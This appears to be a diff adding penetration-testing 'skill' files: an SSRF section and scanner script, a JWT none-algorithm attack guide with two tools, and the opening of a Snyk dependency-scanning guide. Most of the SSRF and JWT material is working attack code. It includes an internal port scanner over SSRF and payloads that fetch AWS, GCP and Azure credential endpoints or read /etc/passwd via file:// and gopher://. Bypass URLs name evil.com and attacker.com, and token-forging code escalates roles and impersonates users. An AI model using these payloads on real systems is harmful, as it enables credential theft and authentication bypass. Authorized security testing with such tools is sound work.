+    """Detect SSRF via response time difference between open and closed ports."""
+    # Baseline: request to a closed port (should timeout slower)
+    start = time.time()
+    try:
+        requests.get(target_url, params={param_name: closed_port_url}, timeout=15)
+    except requests.Timeout:
+        pass
+    closed_time = time.time() - start
+
+    # Test: request to an open port (should respond faster)
+    start = time.time()
+    try:
+        requests.get(target_url, params={param_name: open_port_url}, timeout=15)
+    except requests.Timeout:
+        pass
+    open_time = time.time() - start
+
+    # Significant time difference indicates SSRF
+    return {
+        "open_port_time": round(open_time, 2),
+        "closed_port_time": round(closed_time, 2),
+        "likely_ssrf": abs(closed_time - open_time) > 2.0,
+    }
+```
+
+### Internal Port Scanner via SSRF
+```python
+def ssrf_port_scan(target_url, param_name, internal_host, ports):
+    """Scan internal ports through a blind SSRF vulnerability."""
+    results = {"open": [], "closed": [], "filtered": []}
+    for port in ports:
+        ssrf_url = f"http://{internal_host}:{port}/"
+        start = time.time()
+        try:
+            resp = requests.get(
+                target_url,
+                params={param_name: ssrf_url},
+                timeout=10,
+            )
+            elapsed = time.time() - start
+            if resp.status_code == 200 and elapsed < 3:
+                results["open"].append(port)
+            else:
+                results["closed"].append(port)
+        except requests.Timeout:
+            results["filtered"].append(port)
+    return results
+```
+
+### URL Bypass Techniques
+```python
+BYPASS_PAYLOADS = [
+    # Decimal IP encoding
+    "http://2130706433/",           # 127.0.0.1
+    # Hex encoding
+    "http://0x7f000001/",           # 127.0.0.1
+    # Octal encoding
+    "http://0177.0.0.1/",
+    # IPv6
+    "http://[::ffff:127.0.0.1]/",
+    # URL encoding
+    "http://127.0.0.1%2523@evil.com/",
+    # DNS rebinding
+    "http://spoofed.burpcollaborator.net/",
+    # Redirect-based
+    "https://attacker.com/redirect?url=http://169.254.169.254/",
+]
+```
+
+## Output Format
+
+```json
+{
+  "target": "https://app.example.com/fetch",
+  "parameter": "url",
+  "ssrf_confirmed": true,
+  "detection_method": "out-of-band",
+  "internal_services_found": [
+    {"host": "127.0.0.1", "port": 6379, "service": "Redis"},
+    {"host": "10.0.0.5", "port": 3306, "service": "MySQL"}
+  ],
+  "cloud_metadata_accessible": true,
+  "bypasses_needed": ["decimal IP encoding"]
+}
+```

--- a/security/skills/performing-blind-ssrf-exploitation/scripts/agent.py
+++ b/security/skills/performing-blind-ssrf-exploitation/scripts/agent.py
@@ -1,0 +1,252 @@
+#!/usr/bin/env python3
+"""Blind SSRF detection agent.
+
+Tests web application endpoints for Server-Side Request Forgery (SSRF)
+vulnerabilities by injecting payloads that trigger out-of-band callbacks.
+Uses configurable payload lists targeting internal services, cloud metadata
+endpoints, and external callback receivers.
+
+AUTHORIZED TESTING ONLY: Only use against targets you have explicit
+written permission to test. Unauthorized SSRF testing is illegal.
+"""
+import argparse
+import json
+import os
+import sys
+import time
+import urllib.parse
+from datetime import datetime, timezone
+
+try:
+    import requests
+except ImportError:
+    print("[!] 'requests' library required: pip install requests", file=sys.stderr)
+    sys.exit(1)
+
+
+SSRF_PAYLOADS = {
+    "aws_metadata": [
+        "http://169.254.169.254/latest/meta-data/",
+        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
+        "http://169.254.169.254/latest/user-data",
+    ],
+    "gcp_metadata": [
+        "http://metadata.google.internal/computeMetadata/v1/",
+        "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",
+    ],
+    "azure_metadata": [
+        "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
+        "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01",
+    ],
+    "internal_services": [
+        "http://127.0.0.1:80/",
+        "http://127.0.0.1:8080/",
+        "http://127.0.0.1:443/",
+        "http://127.0.0.1:3306/",
+        "http://127.0.0.1:6379/",
+        "http://127.0.0.1:9200/",
+        "http://localhost:8500/v1/agent/self",
+        "http://127.0.0.1:2375/containers/json",
+    ],
+    "bypass_filters": [
+        "http://0x7f000001/",
+        "http://0177.0.0.1/",
+        "http://[::1]/",
+        "http://127.1/",
+        "http://127.0.0.1.nip.io/",
+        "http://2130706433/",
+    ],
+    "protocol_smuggling": [
+        "gopher://127.0.0.1:6379/_INFO",
+        "dict://127.0.0.1:6379/INFO",
+        "file:///etc/passwd",
+        "file:///etc/hosts",
+    ],
+}
+
+
+def test_ssrf_parameter(target_url, param_name, payload, method="GET",
+                         headers=None, cookies=None, callback_url=None):
+    """Test a single SSRF payload against a parameter."""
+    test_payload = callback_url or payload
+    if method.upper() == "GET":
+        parsed = urllib.parse.urlparse(target_url)
+        params = urllib.parse.parse_qs(parsed.query)
+        params[param_name] = [test_payload]
+        new_query = urllib.parse.urlencode(params, doseq=True)
+        test_url = urllib.parse.urlunparse(parsed._replace(query=new_query))
+        try:
+            resp = requests.get(test_url, headers=headers, cookies=cookies,
+                                timeout=10, allow_redirects=False)
+        except requests.RequestException as e:
+            return {"payload": payload, "error": str(e), "vulnerable": False}
+    else:
+        data = {param_name: test_payload}
+        try:
+            resp = requests.post(target_url, data=data, headers=headers,
+                                 cookies=cookies, timeout=10, allow_redirects=False)
+        except requests.RequestException as e:
+            return {"payload": payload, "error": str(e), "vulnerable": False}
+
+    indicators = analyze_response(resp, payload)
+    return {
+        "payload": payload,
+        "status_code": resp.status_code,
+        "response_length": len(resp.content),
+        "response_time": resp.elapsed.total_seconds(),
+        "indicators": indicators,
+        "vulnerable": len(indicators) > 0,
+    }
+
+
+def analyze_response(resp, payload):
+    """Analyze HTTP response for SSRF success indicators."""
+    indicators = []
+    body = resp.text.lower()
+
+    # Cloud metadata indicators
+    if "169.254.169.254" in payload:
+        if any(kw in body for kw in ["ami-id", "instance-id", "security-credentials",
+                                       "access-key", "computemetadata", "subscriptionid"]):
+            indicators.append("Cloud metadata content detected in response")
+
+    # Internal service indicators
+    if "127.0.0.1" in payload or "localhost" in payload:
+        if resp.status_code == 200 and len(resp.content) > 0:
+            if any(kw in body for kw in ["redis_version", "elasticsearch", "docker",
+                                          "consul", "apache", "nginx", "server:"]):
+                indicators.append("Internal service response detected")
+
+    # File content indicators
+    if "file://" in payload:
+        if "root:" in body or "localhost" in body:
+            indicators.append("Local file content detected in response")
+
+    # Time-based detection
+    if resp.elapsed.total_seconds() > 5:
+        indicators.append(f"Slow response ({resp.elapsed.total_seconds():.1f}s) - possible network timeout to internal host")
+
+    # Differential response analysis
+    if resp.status_code in (200, 301, 302) and len(resp.content) > 100:
+        indicators.append(f"Non-error response with content (status: {resp.status_code}, size: {len(resp.content)})")
+
+    return indicators
+
+
+def run_ssrf_scan(target_url, param_name, method="GET", categories=None,
+                   headers=None, cookies=None, callback_url=None):
+    """Run SSRF tests across payload categories."""
+    if categories is None:
+        categories = list(SSRF_PAYLOADS.keys())
+
+    results = []
+    total = sum(len(SSRF_PAYLOADS.get(c, [])) for c in categories)
+    print(f"[*] Testing {total} SSRF payloads across {len(categories)} categories")
+    print(f"[*] Target: {target_url} (param: {param_name}, method: {method})")
+
+    for category in categories:
+        payloads = SSRF_PAYLOADS.get(category, [])
+        print(f"\n  [{category}] Testing {len(payloads)} payloads...")
+        for payload in payloads:
+            result = test_ssrf_parameter(
+                target_url, param_name, payload, method, headers, cookies, callback_url
+            )
+            result["category"] = category
+            results.append(result)
+            if result["vulnerable"]:
+                print(f"    [VULN] {payload}")
+                for ind in result["indicators"]:
+                    print(f"           -> {ind}")
+            time.sleep(0.5)  # Rate limiting
+
+    return results
+
+
+def format_summary(results, target_url):
+    """Print scan summary."""
+    vulnerable = [r for r in results if r.get("vulnerable")]
+    print(f"\n{'='*60}")
+    print(f"  SSRF Scan Report")
+    print(f"{'='*60}")
+    print(f"  Target       : {target_url}")
+    print(f"  Payloads     : {len(results)}")
+    print(f"  Vulnerable   : {len(vulnerable)}")
+
+    if vulnerable:
+        print(f"\n  Confirmed/Suspected Vulnerabilities:")
+        for v in vulnerable:
+            print(f"    [{v['category']:20s}] {v['payload']}")
+            for ind in v.get("indicators", []):
+                print(f"      -> {ind}")
+
+    by_category = {}
+    for r in vulnerable:
+        by_category.setdefault(r["category"], []).append(r)
+    if by_category:
+        print(f"\n  Findings by Category:")
+        for cat, items in by_category.items():
+            print(f"    {cat:25s}: {len(items)} finding(s)")
+
+
+def main():
+    parser = argparse.ArgumentParser(
+        description="Blind SSRF detection agent (authorized testing only)"
+    )
+    parser.add_argument("--target", required=True, help="Target URL with parameter to test")
+    parser.add_argument("--param", required=True, help="Parameter name to inject SSRF payloads into")
+    parser.add_argument("--method", choices=["GET", "POST"], default="GET")
+    parser.add_argument("--categories", nargs="+", choices=list(SSRF_PAYLOADS.keys()),
+                        help="SSRF payload categories to test")
+    parser.add_argument("--callback", help="Out-of-band callback URL (e.g., Burp Collaborator)")
+    parser.add_argument("--header", nargs="+", help="Custom headers (key:value)")
+    parser.add_argument("--cookie", help="Cookie string")
+    parser.add_argument("--output", "-o", help="Output JSON report path")
+    parser.add_argument("--verbose", "-v", action="store_true")
+    args = parser.parse_args()
+
+    headers = {}
+    if args.header:
+        for h in args.header:
+            k, v = h.split(":", 1)
+            headers[k.strip()] = v.strip()
+    cookies = {}
+    if args.cookie:
+        for pair in args.cookie.split(";"):
+            if "=" in pair:
+                k, v = pair.strip().split("=", 1)
+                cookies[k] = v
+
+    results = run_ssrf_scan(
+        args.target, args.param, args.method, args.categories,
+        headers or None, cookies or None, args.callback
+    )
+    format_summary(results, args.target)
+
+    vulnerable = [r for r in results if r.get("vulnerable")]
+    report = {
+        "timestamp": datetime.now(timezone.utc).isoformat(),
+        "tool": "SSRF Scanner",
+        "target": args.target,
+        "parameter": args.param,
+        "total_payloads": len(results),
+        "vulnerable_count": len(vulnerable),
+        "findings": vulnerable,
+        "all_results": results if args.verbose else [],
+        "risk_level": (
+            "CRITICAL" if any(r["category"] in ("aws_metadata", "gcp_metadata", "azure_metadata")
+                             for r in vulnerable)
+            else "HIGH" if vulnerable
+            else "LOW"
+        ),
+    }
+
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2)
+        print(f"\n[+] Report saved to {args.output}")
+    elif args.verbose:
+        print(json.dumps(report, indent=2))
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-jwt-none-algorithm-attack/SKILL.md
+++ b/security/skills/performing-jwt-none-algorithm-attack/SKILL.md
@@ -1,0 +1,345 @@
+---
+name: performing-jwt-none-algorithm-attack
+description: Execute and test the JWT none algorithm attack to bypass signature verification
+  by manipulating the alg header field in JSON Web Tokens.
+domain: cybersecurity
+subdomain: api-security
+tags:
+- jwt
+- none-algorithm
+- authentication-bypass
+- token-manipulation
+- signature-bypass
+- penetration-testing
+- owasp
+- web-security
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1552.001
+- T1027
+- T1070
+---
+
+# Performing JWT None Algorithm Attack
+
+## Overview
+
+The JWT none algorithm attack exploits a vulnerability in JSON Web Token libraries that accept tokens with the `alg` header set to `none`, effectively bypassing signature verification. When a server processes a JWT with `"alg": "none"`, it treats the token as valid without checking any cryptographic signature, allowing attackers to forge tokens with arbitrary claims such as escalated privileges, impersonated users, or extended expiration times. This vulnerability was first disclosed by Tim McLean in 2015 and has affected multiple JWT libraries across languages.
+
+
+## When to Use
+
+- When conducting security assessments that involve performing jwt none algorithm attack
+- When following incident response procedures for related security events
+- When performing scheduled security testing or auditing activities
+- When validating security controls through hands-on testing
+
+## Prerequisites
+
+- Target application using JWT for authentication or authorization
+- Ability to intercept and modify HTTP requests (Burp Suite, mitmproxy)
+- Python 3.8+ with PyJWT library for token crafting
+- Understanding of JWT structure (Header.Payload.Signature)
+- Authorization to perform security testing on the target
+
+
+> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
+
+## JWT Structure
+
+A JWT consists of three Base64URL-encoded parts separated by dots:
+
+```
+Header.Payload.Signature
+
+eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.    # Header
+eyJzdWIiOiIxMjM0IiwibmFtZSI6IkpvaG4ifQ.    # Payload
+SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c  # Signature
+```
+
+## Attack Methodology
+
+### Step 1: Capture a Valid JWT
+
+Intercept a legitimate JWT from the target application using Burp Suite or browser developer tools:
+
+```
+Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
+```
+
+### Step 2: Decode and Analyze the Token
+
+```python
+import base64
+import json
+
+token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
+
+parts = token.split('.')
+
+# Decode header
+header = json.loads(base64.urlsafe_b64decode(parts[0] + '=='))
+print(f"Header: {header}")
+# Output: {'alg': 'HS256', 'typ': 'JWT'}
+
+# Decode payload
+payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
+print(f"Payload: {payload}")
+# Output: {'sub': '1234567890', 'name': 'John Doe', 'role': 'user', 'iat': 1516239022}
+```
+
+### Step 3: Craft a Forged Token with None Algorithm
+
+```python
+#!/usr/bin/env python3
+"""JWT None Algorithm Attack Tool
+
+Crafts JWT tokens with the 'none' algorithm to test for
+signature verification bypass vulnerabilities.
+"""
+
+import base64
+import json
+import requests
+import sys
+from typing import Optional
+
+class JWTNoneAttack:
+    # All known variations of the 'none' algorithm value
+    NONE_VARIANTS = [
+        "none",
+        "None",
+        "NONE",
+        "nOnE",
+        "noNe",
+        "NoNe",
+        "nONE",
+        "nonE",
+    ]
+
+    def __init__(self, target_url: str, original_token: str):
+        self.target_url = target_url
+        self.original_token = original_token
+        self.original_header, self.original_payload = self._decode_token(original_token)
+
+    def _base64url_encode(self, data: bytes) -> str:
+        """Base64URL encode without padding."""
+        return base64.urlsafe_b64encode(data).rstrip(b'=').decode('utf-8')
+
+    def _base64url_decode(self, data: str) -> bytes:
+        """Base64URL decode with padding restoration."""
+        padding = 4 - len(data) % 4
+        if padding != 4:
+            data += '=' * padding
+        return base64.urlsafe_b64decode(data)
+
+    def _decode_token(self, token: str) -> tuple:
+        """Decode JWT header and payload."""
+        parts = token.split('.')
+        header = json.loads(self._base64url_decode(parts[0]))
+        payload = json.loads(self._base64url_decode(parts[1]))
+        return header, payload
+
+    def craft_none_token(self, modified_payload: dict,
+                          alg_variant: str = "none") -> str:
+        """Craft a JWT with the none algorithm and modified payload."""
+        # Create header with none algorithm
+        header = {"alg": alg_variant, "typ": "JWT"}
+        header_encoded = self._base64url_encode(json.dumps(header).encode())
+
+        # Encode modified payload
+        payload_encoded = self._base64url_encode(json.dumps(modified_payload).encode())
+
+        # Token with empty signature (just trailing dot)
+        return f"{header_encoded}.{payload_encoded}."
+
+    def craft_privilege_escalation(self, role_field: str = "role",
+                                     admin_value: str = "admin") -> list:
+        """Create tokens with escalated privileges using all none variants."""
+        tokens = []
+        modified_payload = dict(self.original_payload)
+        modified_payload[role_field] = admin_value
+
+        for variant in self.NONE_VARIANTS:
+            token = self.craft_none_token(modified_payload, variant)
+            tokens.append({"variant": variant, "token": token})
+
+        return tokens
+
+    def craft_user_impersonation(self, target_user_id: str,
+                                   user_field: str = "sub") -> str:
+        """Create a token impersonating another user."""
+        modified_payload = dict(self.original_payload)
+        modified_payload[user_field] = target_user_id
+        return self.craft_none_token(modified_payload)
+
+    def test_none_variants(self, endpoint: str = "/api/profile",
+                            headers: Optional[dict] = None) -> list:
+        """Test all none algorithm variants against the target."""
+        results = []
+        base_headers = headers or {}
+
+        for variant in self.NONE_VARIANTS:
+            modified_payload = dict(self.original_payload)
+            modified_payload["role"] = "admin"
+            token = self.craft_none_token(modified_payload, variant)
+
+            test_headers = dict(base_headers)
+            test_headers["Authorization"] = f"Bearer {token}"
+
+            try:
+                response = requests.get(
+                    f"{self.target_url}{endpoint}",
+                    headers=test_headers,
+                    timeout=10
+                )
+                result = {
+                    "variant": variant,
+                    "status_code": response.status_code,
+                    "accepted": response.status_code == 200,
+                    "response_length": len(response.content),
+                }
+                results.append(result)
+
+                if response.status_code == 200:
+                    print(f"  [VULNERABLE] alg='{variant}' -> {response.status_code}")
+                else:
+                    print(f"  [SAFE] alg='{variant}' -> {response.status_code}")
+
+            except requests.exceptions.RequestException as e:
+                results.append({
+                    "variant": variant,
+                    "status_code": 0,
+                    "accepted": False,
+                    "error": str(e)
+                })
+
+        return results
+
+    def test_empty_signature_variants(self) -> list:
+        """Test different empty signature formats."""
+        modified_payload = dict(self.original_payload)
+        modified_payload["role"] = "admin"
+        header = {"alg": "none", "typ": "JWT"}
+
+        header_encoded = self._base64url_encode(json.dumps(header).encode())
+        payload_encoded = self._base64url_encode(json.dumps(modified_payload).encode())
+
+        # Different signature formats
+        variants = [
+            f"{header_encoded}.{payload_encoded}.",      # Empty signature with trailing dot
+            f"{header_encoded}.{payload_encoded}",       # No trailing dot
+            f"{header_encoded}.{payload_encoded}.AA==",  # Minimal base64 signature
+        ]
+
+        results = []
+        for token in variants:
+            results.append({"token_format": token[-20:], "token": token})
+
+        return results
+
+
+def main():
+    if len(sys.argv) < 3:
+        print("Usage: python jwt_none_attack.py <target_url> <original_token>")
+        print("Example: python jwt_none_attack.py https://api.example.com eyJhbG...")
+        sys.exit(1)
+
+    target_url = sys.argv[1]
+    original_token = sys.argv[2]
+
+    attacker = JWTNoneAttack(target_url, original_token)
+
+    print(f"\nOriginal Token Header: {attacker.original_header}")
+    print(f"Original Token Payload: {attacker.original_payload}")
+
+    print(f"\n{'='*60}")
+    print("Testing None Algorithm Variants")
+    print(f"{'='*60}")
+    results = attacker.test_none_variants()
+
+    vulnerable = [r for r in results if r.get("accepted")]
+    if vulnerable:
+        print(f"\n[!] VULNERABLE: {len(vulnerable)} variant(s) accepted!")
+        print("[!] The server does not properly validate JWT signatures")
+    else:
+        print(f"\n[+] SECURE: All none algorithm variants were rejected")
+
+
+if __name__ == "__main__":
+    main()
+```
+
+### Step 4: Additional JWT Attack Variants
+
+**Algorithm Confusion (RS256 to HS256):**
+If the server uses RS256 (asymmetric), an attacker who knows the public key can:
+1. Change `alg` to `HS256`
+2. Sign the token using the public key as the HMAC secret
+3. The server may verify the signature using its public key as an HMAC key
+
+**JWK Header Injection (CVE-2018-0114):**
+```json
+{
+  "alg": "RS256",
+  "typ": "JWT",
+  "jwk": {
+    "kty": "RSA",
+    "n": "<attacker-controlled-key>",
+    "e": "AQAB"
+  }
+}
+```
+
+## Mitigation Strategies
+
+```python
+# Secure JWT verification - always specify allowed algorithms
+import jwt
+
+def verify_token_secure(token: str, secret_key: str) -> dict:
+    """Verify JWT with explicit algorithm allowlist."""
+    try:
+        payload = jwt.decode(
+            token,
+            secret_key,
+            algorithms=["HS256"],  # CRITICAL: Explicit allowlist
+            options={
+                "require": ["exp", "iat", "sub"],  # Required claims
+                "verify_exp": True,
+                "verify_iat": True,
+            }
+        )
+        return payload
+    except jwt.InvalidAlgorithmError:
+        raise ValueError("Invalid token algorithm")
+    except jwt.ExpiredSignatureError:
+        raise ValueError("Token expired")
+    except jwt.InvalidTokenError:
+        raise ValueError("Invalid token")
+```
+
+## Detection Indicators
+
+- JWT tokens with `"alg": "none"` (or case variations) in server logs
+- Tokens with empty or missing signature segments
+- Sudden change in algorithm field from normal patterns
+- Tokens with modified claims (role escalation) from the same session
+- Authorization header containing tokens with only two Base64 segments
+
+## References
+
+- OWASP JWT Testing Guide: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/10-Testing_JSON_Web_Tokens
+- Auth0 JWT Vulnerability Disclosure: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
+- PortSwigger JWT None Algorithm: https://portswigger.net/kb/issues/00200901_jwt-none-algorithm-supported
+- HackTricks JWT Vulnerabilities: https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens
+- Invicti JWT Signature Bypass: https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/jwt-signature-bypass-via-none-algorithm

--- a/security/skills/performing-jwt-none-algorithm-attack/references/api-reference.md
+++ b/security/skills/performing-jwt-none-algorithm-attack/references/api-reference.md
@@ -1,0 +1,47 @@
+# API Reference — Performing JWT None Algorithm Attack
+
+## Libraries Used
+- **base64**: Base64url encoding/decoding for JWT components
+- **hmac / hashlib**: HMAC-SHA256 signing for algorithm confusion attacks
+- **json**: JWT header/payload serialization
+- **requests** (optional): Test forged tokens against live endpoints
+
+## CLI Interface
+```
+python agent.py decode --token <jwt_string>
+python agent.py forge --token <jwt_string> [--claims '{"role":"admin"}']
+python agent.py confuse --token <jwt_string> [--pubkey public.pem]
+python agent.py test --url <api_endpoint> --token <original_jwt>
+```
+
+## Core Functions
+
+### `decode_jwt(token)` — Decode JWT without verification
+Returns header, payload, and vulnerability checks: alg=none, no expiry, expired, no issuer.
+
+### `forge_none_token(token, modify_claims)` — Create alg=none variants
+Generates 6 variants: `none`, `None`, `NONE`, `nOnE`, empty signature, no trailing dot.
+
+### `test_alg_confusion(token, public_key_file)` — Algorithm confusion attack
+Tests RS256-to-HS256 downgrade using RSA public key as HMAC secret.
+
+### `test_jwt_endpoint(url, original_token, forged_tokens)` — Validate against API
+Sends forged tokens to target endpoint. Reports CRITICAL if any variant accepted.
+
+## JWT None Variants Tested
+| Variant | Algorithm Header |
+|---------|-----------------|
+| alg_none | `"alg": "none"` |
+| alg_None | `"alg": "None"` |
+| alg_NONE | `"alg": "NONE"` |
+| alg_nOnE | `"alg": "nOnE"` |
+| empty_sig | No signature segment |
+
+## Severity Classification
+- **CRITICAL**: Any none-algorithm token accepted by server
+- **INFO**: All forged tokens rejected
+
+## Dependencies
+```
+pip install requests  # optional, for endpoint testing
+```

--- a/security/skills/performing-jwt-none-algorithm-attack/scripts/agent.py
+++ b/security/skills/performing-jwt-none-algorithm-attack/scripts/agent.py
@@ -1,0 +1,164 @@
+#!/usr/bin/env python3
+# For authorized penetration testing and educational environments only.
+# Usage against targets without prior mutual consent is illegal.
+# It is the end user's responsibility to obey all applicable local, state and federal laws.
+"""Agent for performing JWT 'none' algorithm attack testing."""
+
+import json
+import argparse
+import base64
+import hmac
+import hashlib
+from datetime import datetime
+
+
+def b64url_encode(data):
+    """Base64url encode bytes."""
+    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
+
+
+def b64url_decode(s):
+    """Base64url decode string."""
+    s += "=" * (4 - len(s) % 4)
+    return base64.urlsafe_b64decode(s)
+
+
+def decode_jwt(token):
+    """Decode and display JWT components without verification."""
+    parts = token.split(".")
+    if len(parts) not in (2, 3):
+        return {"error": "Invalid JWT format — expected 2 or 3 parts"}
+    header = json.loads(b64url_decode(parts[0]))
+    payload = json.loads(b64url_decode(parts[1]))
+    signature = parts[2] if len(parts) == 3 else ""
+    vuln_checks = {
+        "alg_none_in_header": header.get("alg", "").lower() in ("none", ""),
+        "alg_symmetric": header.get("alg", "").startswith("HS"),
+        "no_expiry": "exp" not in payload,
+        "expired": payload.get("exp", float("inf")) < datetime.utcnow().timestamp() if "exp" in payload else False,
+        "no_issuer": "iss" not in payload,
+    }
+    return {"header": header, "payload": payload, "signature_present": bool(signature), "vulnerability_checks": vuln_checks}
+
+
+def forge_none_token(token, modify_claims=None):
+    """Forge a JWT with 'none' algorithm (removes signature)."""
+    parts = token.split(".")
+    payload = json.loads(b64url_decode(parts[0]))
+    claims = json.loads(b64url_decode(parts[1]))
+    if modify_claims:
+        claims.update(modify_claims)
+    none_header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
+    new_payload = b64url_encode(json.dumps(claims).encode())
+    variants = [
+        {"name": "alg_none", "token": f"{none_header}.{new_payload}."},
+        {"name": "alg_None", "token": f"{b64url_encode(json.dumps({'alg': 'None', 'typ': 'JWT'}).encode())}.{new_payload}."},
+        {"name": "alg_NONE", "token": f"{b64url_encode(json.dumps({'alg': 'NONE', 'typ': 'JWT'}).encode())}.{new_payload}."},
+        {"name": "alg_nOnE", "token": f"{b64url_encode(json.dumps({'alg': 'nOnE', 'typ': 'JWT'}).encode())}.{new_payload}."},
+        {"name": "empty_sig", "token": f"{none_header}.{new_payload}"},
+        {"name": "no_dot", "token": f"{none_header}.{new_payload}"},
+    ]
+    return {
+        "original_claims": json.loads(b64url_decode(parts[1])),
+        "modified_claims": claims,
+        "forged_tokens": variants,
+    }
+
+
+def test_alg_confusion(token, public_key_file=None):
+    """Test algorithm confusion (RS256 -> HS256 using public key as HMAC secret)."""
+    parts = token.split(".")
+    header = json.loads(b64url_decode(parts[0]))
+    claims = json.loads(b64url_decode(parts[1]))
+    results = {"original_alg": header.get("alg"), "tests": []}
+    if public_key_file:
+        try:
+            pubkey = open(public_key_file, "rb").read()
+            hs256_header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
+            payload_b64 = b64url_encode(json.dumps(claims).encode())
+            signing_input = f"{hs256_header}.{payload_b64}".encode()
+            signature = b64url_encode(hmac.new(pubkey, signing_input, hashlib.sha256).digest())
+            results["tests"].append({
+                "name": "RS256_to_HS256_confusion",
+                "forged_token": f"{hs256_header}.{payload_b64}.{signature}",
+                "description": "Uses RSA public key as HMAC-SHA256 secret",
+            })
+        except Exception as e:
+            results["tests"].append({"name": "RS256_to_HS256_confusion", "error": str(e)})
+    none_header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
+    payload_b64 = b64url_encode(json.dumps(claims).encode())
+    results["tests"].append({
+        "name": "alg_none_downgrade",
+        "forged_token": f"{none_header}.{payload_b64}.",
+        "description": "Downgrade to 'none' algorithm — removes signature",
+    })
+    return results
+
+
+def test_jwt_endpoint(url, original_token, forged_tokens, headers=None):
+    """Test forged JWTs against a target endpoint."""
+    try:
+        import requests
+    except ImportError:
+        return {"error": "requests not installed"}
+    hdrs = headers or {}
+    results = []
+    for ft in forged_tokens:
+        test_headers = {**hdrs, "Authorization": f"Bearer {ft['token']}"}
+        try:
+            resp = requests.get(url, headers=test_headers, timeout=10)
+            accepted = resp.status_code in (200, 201, 204)
+            results.append({
+                "variant": ft["name"], "status": resp.status_code,
+                "accepted": accepted, "body_snippet": resp.text[:200],
+            })
+        except Exception as e:
+            results.append({"variant": ft["name"], "error": str(e)})
+    orig_resp = None
+    try:
+        resp = requests.get(url, headers={**hdrs, "Authorization": f"Bearer {original_token}"}, timeout=10)
+        orig_resp = {"status": resp.status_code, "body_length": len(resp.text)}
+    except Exception:
+        pass
+    vulnerable = [r for r in results if r.get("accepted")]
+    return {
+        "url": url, "original_response": orig_resp,
+        "tests": results, "vulnerable_variants": len(vulnerable),
+        "finding": "JWT_NONE_VULNERABLE" if vulnerable else "JWT_NONE_REJECTED",
+        "severity": "CRITICAL" if vulnerable else "INFO",
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(description="JWT None Algorithm Attack Agent")
+    sub = parser.add_subparsers(dest="command")
+    d = sub.add_parser("decode", help="Decode JWT token")
+    d.add_argument("--token", required=True)
+    f = sub.add_parser("forge", help="Forge none-algorithm token")
+    f.add_argument("--token", required=True)
+    f.add_argument("--claims", help="JSON claims to modify")
+    c = sub.add_parser("confuse", help="Test algorithm confusion")
+    c.add_argument("--token", required=True)
+    c.add_argument("--pubkey", help="RSA public key file for HS256 confusion")
+    t = sub.add_parser("test", help="Test forged tokens against endpoint")
+    t.add_argument("--url", required=True)
+    t.add_argument("--token", required=True)
+    args = parser.parse_args()
+    if args.command == "decode":
+        result = decode_jwt(args.token)
+    elif args.command == "forge":
+        claims = json.loads(args.claims) if args.claims else None
+        result = forge_none_token(args.token, claims)
+    elif args.command == "confuse":
+        result = test_alg_confusion(args.token, args.pubkey)
+    elif args.command == "test":
+        forged = forge_none_token(args.token)
+        result = test_jwt_endpoint(args.url, args.token, forged["forged_tokens"])
+    else:
+        parser.print_help()
+        return
+    print(json.dumps(result, indent=2, default=str))
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-sca-dependency-scanning-with-snyk/SKILL.md
+++ b/security/skills/performing-sca-dependency-scanning-with-snyk/SKILL.md
@@ -1,0 +1,266 @@
+---
+name: performing-sca-dependency-scanning-with-snyk
+description: 'This skill covers implementing Software Composition Analysis (SCA) using
+  Snyk to detect vulnerable open-source dependencies in CI/CD pipelines. It addresses
+  scanning package manifests and lockfiles, automated fix pull request generation,
+  license compliance checking, continuous monitoring of deployed applications, and
+  integration with GitHub, GitLab, and Jenkins pipelines.
+
+  '
+domain: cybersecurity
+subdomain: devsecops
+tags:
+- devsecops
+- cicd
+- sca
+- snyk
+- dependency-scanning
+- secure-sdlc
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- GV.SC-07
+- ID.IM-04
+- PR.PS-04
+mitre_attack:
+- T1195
+- T1554
+- T1059.004
+---
+
+# Performing SCA Dependency Scanning with Snyk
+
+## When to Use
+
+- When applications use open-source packages that may contain known vulnerabilities
+- When compliance requires tracking and remediating vulnerable dependencies (PCI DSS, SOC 2)
+- When needing automated fix PRs for vulnerable dependencies in CI/CD
+- When license compliance requires visibility into open-source license obligations
+- When continuous monitoring is needed for newly disclosed vulnerabilities in deployed dependencies
+
